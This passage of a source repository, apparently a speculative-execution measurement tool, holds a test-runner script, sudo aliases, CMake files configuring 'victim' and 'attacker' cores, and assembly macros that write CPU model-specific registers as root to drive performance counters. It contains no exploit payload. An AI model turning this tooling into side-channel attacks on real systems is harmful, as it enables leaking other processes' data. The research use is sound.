= conn.execute(sel) 146 | # fh = open(f+".csv", "wb") 147 | # outcsv = csv.writer(fh) 148 | # outcsv.writerow(res.keys()) 149 | # outcsv.writerows(res) 150 | # fh.close() 151 | 152 | final.write ("######### {} ###########\n".format(f)) 153 | first = True 154 | i = 0 155 | for clm in table.c: 156 | if first: 157 | first = False 158 | continue 159 | sql = select([clm]) 160 | res = [] 161 | 162 | sql_res = conn.execute(sql) 163 | for row in sql_res: 164 | res.append(row[0]) 165 | 166 | final.write("{}: average: {}, std deviation: {}\n" 167 | .format(categories[i], 168 | average(res), 169 | std(res) 170 | ) 171 | ) 172 | i = i+1 173 | final.write ("---------------------------------------------------------\n") 174 | table.drop(engine) 175 | 176 | except IOError as e: 177 | print ("{}".format(e)) 178 | exit(-1) 179 | 180 | 181 | if __name__ == "__main__": 182 | main() 183 | -------------------------------------------------------------------------------- /scripts/run_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 
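
import os
import sys
import argparse
import subprocess
import multiprocessing

def main():
    """Run speculator_mon once for every executable found under <projectpath>/tests.

    Command line:
      projectpath    base directory holding `tests/`, `results/` and the
                     `speculator_mon` binary
      --repeat/-r    value passed to speculator_mon's -r option (default 10000)
      --cleanup/-c   delete every file under <projectpath>/results first

    For each executable file one result file is written to
    <projectpath>/results/<name>, or <name>_<j> when that name is taken.

    NOTE(review): speculator.env's spec_run_all alias starts this script through
    sudo. Every executable file below <projectpath>/tests is then handed to
    speculator_mon, and --cleanup removes whatever is below
    <projectpath>/results, so neither directory nor the speculator_mon binary
    should be writable by accounts that are not trusted with root.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('projectpath',
                        help='Test base path where tests are looked for')
    parser.add_argument('--repeat', '-r', help='Number of repeatition',
                        default=10000, type=int)
    parser.add_argument('--cleanup', '-c', help='Cleanup result folder',
                        action='store_true')

    args = parser.parse_args()

    # Pin this process to the highest-numbered CPU. The command is passed as an
    # argument list, so no shell is involved.
    try:
        subprocess.call(["taskset", "-pc",
                         str(multiprocessing.cpu_count() - 1),
                         str(os.getpid())])
    except OSError:
        # taskset missing: carry on unpinned, as the os.system call this
        # replaces did.
        print("Unable to run taskset, continuing without CPU pinning")

    results_dir = os.path.join(args.projectpath, "results")
    spec_mon = os.path.join(args.projectpath, "speculator_mon")

    if args.cleanup:
        print ("Cleaning up results folder as requested\n")
        for dirname, _, filenames in os.walk(results_dir):
            for f in filenames:
                stale = os.path.join(dirname, f)
                print("Deleting {}".format(stale))
                os.remove(stale)

    i = 0
    for dirname, _, filenames in os.walk(os.path.join(args.projectpath, "tests")):
        for binname in filenames:
            # Pick a result file name that does not exist yet.
            results_path = os.path.join(results_dir, binname)
            j = 0
            while os.path.isfile(results_path):
                results_path = os.path.join(results_dir, binname + "_" + str(j))
                j = j + 1

            exec_path = os.path.join(dirname, binname)
            if not os.access(exec_path, os.X_OK):
                continue
            try:
                proc = subprocess.Popen([spec_mon, '-r',
                                         str(args.repeat),
                                         '-o', results_path,
                                         '-v', exec_path],
                                        stdout=subprocess.PIPE)
            except OSError:
                print("Error during the call of speculator_mon, double check the "
                      "file location")
                sys.exit(-1)
            i = i + 1
            proc.communicate()
            if proc.returncode != 0:
                # Keep going, but do not let a failed run look like a good one.
                print("speculator_mon exited with status {} for {}"
                      .format(proc.returncode, binname))
            print ("{}) Execution of {} terminated.\n"
                   "Results written at {}\n".format(i, binname, results_path))

    print ("Finished.\n")

if __name__ == '__main__':
    main()
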
-------------------------------------------------------------------------------- /speculator.env: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # SPEC_H points to the main folder of speculator 16 | export SPEC_H="$HOME/speculator" 17 | 18 | # SPEC_B points to the build directory 19 | export SPEC_B="$HOME/speculator_build" 20 | 21 | # SPEC_I points to the install directory 22 | export SPEC_I="$HOME/speculator_install" 23 | 24 | alias speculator="sudo --preserve-env=SPEC_I \ 25 | --preserve-env=SPEC_B \ 26 | --preserve-env=SPEC_H \ 27 | $SPEC_I/speculator_mon" 28 | 29 | alias spec_configure="cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I" 30 | 31 | alias spec_build_ninja="ninja -C $SPEC_B install" 32 | 33 | alias spec_build_make="make -C $SPEC_B install" 34 | 35 | alias spec_cleanup_install="rm -rf $SPEC_I/*" 36 | alias spec_cleanup_build="rm -rf $SPEC_B/*" 37 | alias spec_cleanup_all="spec_cleanup_build && spec_cleanup_install" 38 | 39 | alias spec_all="spec_configure && spec_build_make" 40 | alias spec_all_ninja="spec_configure -G \"Ninja\" && spec_build_ninja" 41 | alias spec_run_all="sudo --preserve-env=SPEC_I \ 42 | --preserve-env=SPEC_B \ 43 | --preserve-env=SPEC_H $SPEC_I/scripts/run_test.py" 44 | 45 | alias spec_aggregate="$SPEC_I/scripts/post-processing.py -l 
$SPEC_I/results" 46 | -------------------------------------------------------------------------------- /src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | cmake_minimum_required (VERSION 3.1) 16 | 17 | # Define speculator_mon executable target 18 | add_executable (speculator_mon speculator_monitor.c) 19 | 20 | target_include_directories(speculator_mon PRIVATE ${CMAKE_BINARY_DIR}) 21 | 22 | IF (${VENDOR} STREQUAL "AuthenticAMD") 23 | target_compile_definitions(speculator_mon PRIVATE AMD) 24 | ELSEIF (${VENDOR} STREQUAL "GenuineIntel") 25 | target_compile_definitions(speculator_mon PRIVATE INTEL) 26 | ENDIF() 27 | 28 | # Add link options for speculator_mon 29 | target_link_libraries(speculator_mon json-c pfm pthread) 30 | 31 | target_compile_options(speculator_mon PRIVATE "-Wall") 32 | target_compile_options(speculator_mon PRIVATE "-Werror") 33 | target_compile_options(speculator_mon PRIVATE "--pedantic-errors") 34 | 35 | set_property(TARGET speculator_mon PROPERTY C_STANDARD 11) 36 | 37 | #### DEBUG OPTION 38 | IF (DEBUG) 39 | message(STATUS "Debug Mode ON") 40 | unset(DEBUG CACHE) 41 | target_compile_definitions(speculator_mon PRIVATE DEBUG) 42 | ELSE() 43 | message(STATUS "Debug Mode OFF") 44 | unset(DEBUG CACHE) 45 | ENDIF() 46 | #### 47 | 48 | #### DUMMY OPTION 49 | IF (DUMMY) 50 | 
message(STATUS "Dummy Load Mode ON -- " ${DUMMY}) 51 | target_compile_definitions(speculator_mon PRIVATE DUMMY) 52 | set(DUMMY_NAME ${DUMMY}) 53 | unset(DUMMY CACHE) 54 | ELSE() 55 | message(STATUS "Dummy Load Mode OFF") 56 | unset(DUMMY CACHE) 57 | ENDIF() 58 | #### 59 | 60 | #### VICTIM 61 | IF (VICTIM) 62 | message(STATUS "Victim specified core -- " ${VICTIM}) 63 | set(VICTIM_CORE ${VICTIM}) 64 | unset(VICTIM CACHE) 65 | ELSE() 66 | message(STATUS "Victim core set to default -- " 0) 67 | set(VICTIM_CORE 0) 68 | unset(VICTIM CACHE) 69 | ENDIF() 70 | #### 71 | 72 | #### ATTACKER 73 | IF (ATTACKER) 74 | message(STATUS "Attacker specified core -- " ${ATTACKER}) 75 | set(ATTACKER_CORE ${ATTACKER}) 76 | unset(ATTACKER CACHE) 77 | ELSE() 78 | message(STATUS "Attacker core set to default -- " 4) 79 | set(ATTACKER_CORE 4) 80 | unset(ATTACKER CACHE) 81 | ENDIF() 82 | #### 83 | 84 | 85 | install(TARGETS speculator_mon 86 | RUNTIME DESTINATION . ) 87 | 88 | configure_file (${CMAKE_SOURCE_DIR}/include/config.h.in ${CMAKE_BINARY_DIR}/config.h) 89 | configure_file (${CMAKE_SOURCE_DIR}/tests/common.inc.in ${CMAKE_SOURCE_DIR}/tests/common.inc) 90 | unset(DUMMY_NAME CACHE) 91 | unset(VICTIM_CORE CACHE) 92 | unset(ATTACKER_CORE CACHE) 93 | -------------------------------------------------------------------------------- /templates/x86/example.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "xor eax, eax", 9 | "xor eax, eax", 10 | "xor eax, eax", 11 | "xor eax, eax", 12 | "xor eax, eax", 13 | "xor eax, eax", 14 | "xor eax, eax", 15 | "xor eax, eax", 16 | "xor eax, eax", 17 | "xor eax, eax", 18 | "xor eax, eax", 19 | "xor eax, eax", 20 | "xor eax, eax", 21 | "xor eax, eax", 22 | "xor eax, eax", 23 | "xor eax, eax", 24 | "xor eax, eax", 25 | "xor eax, eax", 26 | "xor eax, eax" 27 | ] 28 | } 29 | 
-------------------------------------------------------------------------------- /templates/x86/template.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | ;##### DATA STARTS HERE ######## 30 | 31 | ;##### DATA ENDS HERE ######## 32 | 33 | section .text 34 | global perf_test_entry:function 35 | global snippet:function 36 | 37 | perf_test_entry: 38 | push rbp 39 | mov rbp, rsp 40 | sub rsp, len 41 | 42 | check_pinning VICTIM_PROCESS 43 | ;check_pinning ATTACKER_PROCESS 44 | msr_open 45 | msr_seek 46 | 47 | reset_counter 48 | start_counter 49 | 50 | ;##### SNIPPET STARTS HERE ###### 51 | 52 | ;##### SNIPPET ENDS HERE ###### 53 | 54 | stop_counter 55 | 56 | msr_close 57 | exit 0 58 | 59 | -------------------------------------------------------------------------------- /templates/x86/template_branch.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the 
"License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | ;##### DATA STARTS HERE ######## 31 | 32 | ;##### DATA ENDS HERE ######## 33 | 34 | section .text 35 | global perf_test_entry:function 36 | global snippet:function 37 | 38 | perf_test_entry: 39 | push rbp 40 | mov rbp, rsp 41 | sub rsp, len 42 | 43 | check_pinning VICTIM_PROCESS 44 | ;check_pinning ATTACKER_PROCESS 45 | msr_open 46 | msr_seek 47 | .data: 48 | clflush [warmup_cnt] 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | mov ebx, DWORD[warmup_cnt] 55 | cmp ebx, 12 56 | je .else 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | mov ebx, DWORD[warmup_cnt_fake] 61 | cmp ebx, 12 62 | je .else 63 | lfence 64 | .else: 65 | lfence 66 | stop_counter 67 | 68 | inc DWORD[warmup_cnt] 69 | cmp DWORD[warmup_cnt], 13 70 | jl .data 71 | 72 | msr_close 73 | exit 0 74 | -------------------------------------------------------------------------------- /tests/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, 
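Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Builds one executable per test: every .asm file (optionally paired with a
# .c file of the same name) plus every remaining stand-alone .c file.
cmake_minimum_required (VERSION 2.6)

enable_language(ASM_NASM)
if (CMAKE_ASM_NASM_COMPILER_LOADED)
    set(CAN_USE_ASSEMBLER TRUE)
endif(CMAKE_ASM_NASM_COMPILER_LOADED)

# Information for libc
# NOTE(review): both files are prebuilt musl binaries checked into
# tests/musl/; nothing in this file records which musl version or build
# flags produced them, so their provenance cannot be checked from here.
set(LIBC
    ${CMAKE_CURRENT_SOURCE_DIR}/musl/libc.a)

set(LIBCDYN
    ${CMAKE_CURRENT_SOURCE_DIR}/musl/libc.so)

# Look for .asm file inside the asm folder
file(GLOB_RECURSE asmFiles RELATIVE ${CMAKE_CURRENT_SOURCE_DIR}
    ${CMAKE_CURRENT_SOURCE_DIR}/*.asm)

list(LENGTH asmFiles asmFilesN)
message(STATUS "Found ${asmFilesN} asm files")

file(GLOB_RECURSE allcFiles RELATIVE ${CMAKE_CURRENT_SOURCE_DIR}
    ${CMAKE_CURRENT_SOURCE_DIR}/*.c)

list(LENGTH allcFiles allcFilesN)
message(STATUS "Found ${allcFilesN} c files")

add_compile_options(-I ${CMAKE_CURRENT_SOURCE_DIR}/ )


# Set compiler flags to remove optimizations
# CMAKE_C_FLAGS is a single space-separated string. The unquoted form
# set(VAR a b) builds a CMake list, which reaches the compiler command line
# as "<flags>;-O0" whenever CMAKE_C_FLAGS was not empty.
set (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -O0")

# For each .asm file and possible .c respectively, compile and link them together
# in different targets
# NOTE .asm and .c file should have the same name
# NOTE TargetName is the file's base name only, so two tests with the same
# base name in different directories would define the same target.
foreach (asmFileName ${asmFiles})
    # Anchor on the extension: a plain REPLACE would also rewrite ".asm"
    # occurring inside a directory name.
    string(REGEX REPLACE "\\.asm$" ".c" cFileName "${asmFileName}")
    string(REGEX REPLACE "\\.asm$" "" DirName "${asmFileName}")
    string(REGEX REPLACE ".*/" "" TargetName ${DirName})

    set_source_files_properties(${asmFileName} PROPERTIES COMPILE_FLAGS
        "-f elf64")


    if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/${cFileName})
        message (STATUS "Found test " ${asmFileName} " " ${cFileName})

        # Paired .c files are built here, not by the stand-alone loop below.
        list (REMOVE_ITEM allcFiles ${cFileName})

        # CANARY selects the dynamically linked build with
        # -fstack-protector-all; the default build turns the stack
        # protector off for the paired .c file.
        if (CANARY)
            add_executable(${TargetName} ${asmFileName} ${LIBCDYN} ${cFileName})
            message("\tSetting full stack protection")
            set_source_files_properties(${cFileName} PROPERTIES COMPILE_FLAGS
                "-fstack-protector-all")
        else()
            message("\tNO full stack protection")
            add_executable(${TargetName} ${asmFileName} ${LIBC} ${cFileName})
            set_source_files_properties(${cFileName} PROPERTIES COMPILE_FLAGS
                "-fno-stack-protector")
        endif()

    else()
        message (STATUS "Found test " ${asmFileName})
        add_executable(${TargetName} ${asmFileName} ${LIBC})
        set_target_properties(${TargetName} PROPERTIES LINKER_LANGUAGE "C" )
    endif()

    set_property(TARGET ${TargetName} PROPERTY C_STANDARD 11)

    # Both variants drop the C runtime start files and enter directly at
    # perf_test_entry. The default variant is fully static and links
    # without the system libraries; the CANARY variant is dynamic and
    # non-PIE.
    if (NOT CANARY)
        message("\tlinking with libc.a")
        target_link_libraries(${TargetName} -lrt -static -nostartfiles -nostdlib
            -fno-asynchronous-unwind-tables -fno-exceptions -Wl,-eperf_test_entry
            -Wl,--build-id=none -Wl,--as-needed ${LIBC})
    else ()
        message("\tlinking with libc.so")
        target_link_libraries(${TargetName} -lrt -nostartfiles -no-pie -Wl,-eperf_test_entry)
    endif()

    # Set target installation
    install(TARGETS ${TargetName}
        RUNTIME DESTINATION tests/${DirName})
endforeach(asmFileName)

# Scan .c files and compile them as separate targets
foreach (cFileName ${allcFiles})
    message(STATUS "Found test " ${cFileName})
    # Anchor on the extension: a plain REPLACE would also strip ".c" from a
    # directory such as "foo.cache/".
    string(REGEX REPLACE "\\.c$" "" DirName "${cFileName}")
    string(REGEX REPLACE ".*/" "" TargetName ${DirName})

    add_executable(${TargetName} ${cFileName})
    set_target_properties(${TargetName} PROPERTIES C_STANDARD 11)
    install(TARGETS ${TargetName}
        RUNTIME DESTINATION tests/${DirName})
endforeach(cFileName)

--------------------------------------------------------------------------------
/tests/include/x86/amd.inc:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.

; reset_counter: write 0 to four counter MSRs through the open MSR file.
; The whole body is skipped unless getuid() returns 0.
; Uses the including file's fd, val and len symbols.
; Clobbers rax, rdi, rsi, rdx, r10, rcx (plus whatever syscall clobbers).
; The pwrite64 return value is not checked, so a failed write is silent.
%macro reset_counter 0
    mov rax, SYS_GETUID
    syscall
    cmp rax, 0
    jne %%.skip
    mov rcx, 4
%%.reset_pr_counters:
    push rcx                ; syscall overwrites rcx; keep the iterator
    mov rax, SYS_PWRITE64
    mov rdi, [fd]
    mov QWORD[val], 0
    mov rsi, val
    mov rdx, len
    mov r10, 0xc0010004     ; offset - PerfCtr0 + loop iterator
    add r10, rcx
    sub r10, 1              ; rcx = 4..1 -> MSR 0xc0010007..0xc0010004
    syscall
    pop rcx
    ; loopnz also tests ZF. No instruction between `sub r10, 1` and here
    ; sets flags, so this behaves like `loop` as long as the kernel returns
    ; with the flags unchanged -- NOTE(review): fragile, confirm.
    loopnz %%.reset_pr_counters
%%.skip:
%endmacro

; msr_seek, start_counter and stop_counter expand to nothing in this file.
; The test template invokes all three, so the names have to exist.
%macro msr_seek 0
%endmacro

%macro start_counter 0
%endmacro

%macro stop_counter 0
%endmacro

; don't use this, just reset counters
; Reads the four PerfSel MSRs (0xc0010000 + i) into val, one per iteration.
; NOTE(review): `sel` is not defined in any file shown here, and the value
; stored to sel[i] is rax after the syscall, i.e. the pread64 return value,
; not the 8 bytes that were read into val.
%macro save_mask_unused 0
    mov rcx, 4
%%.read_eventsel:
    push rcx
    mov rax, SYS_PREAD64
    mov rdi, [fd]           ; fd
    mov rsi, val
    mov rdx, len
    mov r10, 0xc0010000; offset - PerfSel0 + loop iterator
    add r10, rcx
    sub r10, 1
    syscall
    pop rcx
    mov r8, rcx
    sub r8, 1
    imul r8, len            ; r8 = (rcx - 1) * len
    add r8, sel             ; r8 = &sel[rcx - 1]
    mov QWORD[r8], rax
    loopnz %%.read_eventsel

%endmacro

; don't use this, just reset counters
; Sets bit 0x400000 in each saved sel[i] and writes it back to PerfSel i.
%macro start_counter_unused 0
    mov rcx, 4
%%.enable_counters:
    push rcx
    mov rax, SYS_PWRITE64
    mov rdi, [fd]
    mov r8, rcx
    sub r8, 1
    imul r8, len
    add r8, sel             ; r8 = &sel[rcx - 1]
    or QWORD[r8], 0x400000  ; PERF_EN
    mov rsi, r8
    mov rdx, len
    mov r10, 0xc0010000     ; offset - PerfSel0 + loop iterator
    add r10, rcx
    sub r10, 1
    syscall
    pop rcx
    loopnz %%.enable_counters

%endmacro

; don't use this, just reset counters
; Clears bit 0x400000 in each saved sel[i] and writes it back to PerfSel i.
%macro stop_counter_unused 0
    mov rcx, 4
%%.disable_counters:
    push rcx
    mov rax, SYS_PWRITE64
    mov rdi, [fd]
    mov r8, rcx
    sub r8, 1
    imul r8, len
    add r8, sel             ; r8 = &sel[rcx - 1]
    and QWORD[r8], ~0x400000 ; PERF_EN
    mov rsi, r8
    mov rdx, len
    mov r10, 0xc0010000     ; offset - PerfSel0 + loop iterator
    add r10, rcx
    sub r10, 1
    syscall
    pop rcx
    loopnz %%.disable_counters
%endmacro

--------------------------------------------------------------------------------
/tests/include/x86/common.inc.in:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.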
; Linux x86-64 system call numbers used by the macros below.
%define SYS_EXIT 60
%define SYS_WRITE 1
%define SYS_OPEN 2
%define SYS_CLOSE 3
%define SYS_LSEEK 8
%define SYS_GETCPU 309
%define SYS_PREAD64 17
%define SYS_PWRITE64 18
%define SYS_GETUID 102
%define SYS_RT_SIGACTION 13
%define SYS_RT_SIGRETURN 15
; Core numbers, as a number and as a string. The @...@ tokens are
; placeholders, presumably substituted when this .in file is configured.
%define VICTIM_PROCESS @VICTIM_CORE@
%define ATTACKER_PROCESS @ATTACKER_CORE@
%define VICTIM_PROCESS_STR "@VICTIM_CORE@"
%define ATTACKER_PROCESS_STR "@ATTACKER_CORE@"

; check_pinning core: busy-wait until getcpu() reports CPU number `core`.
; The CPU number is written to val and then compared as a full qword.
; NOTE(review): getcpu stores a 32-bit unsigned value, so the comparison only
; matches while the upper half of val is zero -- call this before val is
; used for anything else. There is no timeout; an unpinned process spins
; until the scheduler happens to place it on that core.
%macro check_pinning 1
%%.pinning:
    mov rax, SYS_GETCPU
    mov rdi, val            ; where the CPU number is stored
    xor rsi, rsi            ; second and third arguments are NULL
    xor rdx, rdx
    syscall
    mov rax, [val]
    cmp rax, %1
    jne %%.pinning
%endmacro

; msr_open: open the path at dev_file read/write and store the result in fd.
; Unlike the counter macros, this one is not gated on getuid(). The return
; value is stored unchecked, so a failed open leaves a negative errno in the
; low 32 bits of fd and every later read/write on it fails.
%macro msr_open 0
    mov rax, SYS_OPEN
    mov rdi, dev_file       ; path defined by the including test (/dev/cpu/<core>/msr)
    mov rsi, 0x0002         ; O_RDWR
    mov rdx, 600o           ; mode argument; no O_CREAT is passed
    syscall

    mov [fd], eax           ; storing fd for further use (low 32 bits only)
%endmacro

; msr_close: close the descriptor stored by msr_open.
%macro msr_close 0
    mov rax, SYS_CLOSE
    mov rdi, [fd]
    syscall
%endmacro

; exit code: terminate the process with the given status.
%macro exit 1
    mov rax, SYS_EXIT
    mov rdi, %1
    syscall
%endmacro

; print *mem, len
; Writes len bytes at mem to stdout. rdx, rax and rsi are saved and
; restored; rdi is overwritten and not restored.
%macro print 2
    push rdx
    push rax
    push rsi
    mov rax, SYS_WRITE
    mov rdi, 1              ; stdout
    mov rsi, %1
    mov rdx, %2             ;len
    syscall
    pop rsi
    pop rax
    pop rdx
%endmacro


; copy: dst, src, len
; Byte-wise copy from the last byte down to the first; rcx and rbx are
; preserved. NOTE(review): len must be non-zero -- with rcx = 0 the `loop`
; instruction wraps around instead of stopping.
%macro copy 3
    push rcx
    push rbx
    mov rcx, %3
%%.copy:
    mov bl, [%2+rcx-1]
    mov [%1+rcx-1], bl
    loop %%.copy
    pop rbx
    pop rcx
%endmacro

; pipeline_flush: cpuid leaf 0 followed by lfence.
; cpuid overwrites eax, ebx, ecx and edx.
%macro pipeline_flush 0
    mov rax, 0
    cpuid
    lfence
%endmacro

; sys_rt_sigaction - alter an action taken by a process
; @sig: signal to be sent
; @act: new sigaction
; @oact: used to save the previous sigaction
; @sigsetsize: size of sigset_t type
;
; setup_signal_handler sig: install signal_handler for signal `sig`.
; sigaction, signal_handler, signal_restorer, the SA_* flags and NSIG_WORDS
; are not defined in this file; the including test has to provide them.
; The macro ends on `cmp eax, 0`, leaving the flags for the caller to branch
; on the syscall result.
; NOTE(review): rt_sigaction takes sigsetsize in bytes; confirm NSIG_WORDS
; is defined with that in mind.
%macro setup_signal_handler 1
    mov QWORD [sigaction.sa_handler], signal_handler
    mov QWORD [sigaction.sa_restorer], signal_restorer
    mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO
    mov DWORD [sigaction.sa_flags], eax
    mov rax, SYS_RT_SIGACTION ; system call number
    mov rdi, %1             ; signal number
    lea rsi, [sigaction]    ; sigaction struct
    xor rdx, rdx            ; oact = NULL: previous sigaction is not saved
    mov r10, NSIG_WORDS     ; sigsetsize
    syscall
    cmp eax, 0
%endmacro


--------------------------------------------------------------------------------
/tests/include/x86/intel.inc:
--------------------------------------------------------------------------------
; Copyright 2021 IBM Corporation
;
; Licensed under the Apache License, Version 2.0 (the "License");
; you may not use this file except in compliance with the License.
; You may obtain a copy of the License at
;
; http://www.apache.org/licenses/LICENSE-2.0
;
; Unless required by applicable law or agreed to in writing, software
; distributed under the License is distributed on an "AS IS" BASIS,
; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
; See the License for the specific language governing permissions and
; limitations under the License.
; Every counter macro in this file first calls getuid() and skips its body
; unless the result is 0. None of them checks the result of the MSR read or
; write itself, so a rejected access is silent.

; msr_seek: position the MSR file at offset 0x38F (SEEK_SET).
; start_counter and stop_counter below use plain write(), so they depend on
; this offset. 0x38F is IA32_PERF_GLOBAL_CTRL in Intel's MSR numbering --
; confirm for the target CPU.
%macro msr_seek 0
    mov rax, SYS_GETUID
    syscall
    cmp rax, 0
    jne %%.skip
    mov rax, SYS_LSEEK
    mov rdi, [fd]           ; fd
    mov rsi, 0x38F          ; offset
    mov rdx, 0              ;SEEK_SET
    syscall
%%.skip:
%endmacro

; reset_counter: write 0 to eight MSRs starting at 0xC1 and to three MSRs
; starting at 0x309, using pwrite64 with an explicit offset per register.
; Presumably these are the programmable counters (IA32_PMC0..) and the fixed
; counters (IA32_FIXED_CTR0..) -- confirm for the target CPU.
; NOTE(review): eight programmable counters are cleared here, while the mask
; written by start_counter has only the low four bits set.
%macro reset_counter 0
    mov rax, SYS_GETUID
    syscall
    cmp rax, 0
    jne %%.skip
    mov rcx, 8
%%.reset_pr_counters:
    push rcx                ; syscall overwrites rcx; keep the iterator
    mov rax, SYS_PWRITE64
    mov rdi, [fd]
    mov QWORD[val], 0
    mov rsi, val
    mov rdx, len
    mov r10, 0xC1
    add r10, rcx
    sub r10, 1              ; rcx = 8..1 -> MSR 0xC8..0xC1
    syscall
    pop rcx
    ; loopnz also tests ZF, which was last set by `sub r10, 1` above.
    loopnz %%.reset_pr_counters

    mov rcx, 3
%%.reset_fx_counters:
    push rcx
    mov rax, SYS_PWRITE64
    mov rdi, [fd]
    mov QWORD[val], 0
    mov rsi, val
    mov rdx, len
    mov r10, 0x309
    add r10, rcx
    sub r10, 1              ; rcx = 3..1 -> MSR 0x30B..0x309
    syscall
    pop rcx
    loopnz %%.reset_fx_counters
%%.skip:
%endmacro

; start_counter: write 15 | (7 << 32) at the current file offset.
; With the offset set by msr_seek this presumably enables four programmable
; and three fixed counters -- confirm against the MSR layout.
%macro start_counter 0
    mov rax, SYS_GETUID
    syscall
    cmp rax, 0
    jne %%.skip
    mov rax, SYS_WRITE
    mov rdi, [fd]           ; fd
    mov QWORD[val], 7       ; 15 | (7 << 32)
    shl QWORD[val], 32
    or QWORD[val], 15

    mov rsi, val
    mov rdx, len            ;len
    syscall
%%.skip:
%endmacro

; stop_counter: write 0 at the current file offset.
; The getuid syscall above the write runs before the counters are stopped.
%macro stop_counter 0
    mov rax, SYS_GETUID
    syscall
    cmp rax, 0
    jne %%.skip
    mov rdi, [fd]
    mov rsi, val
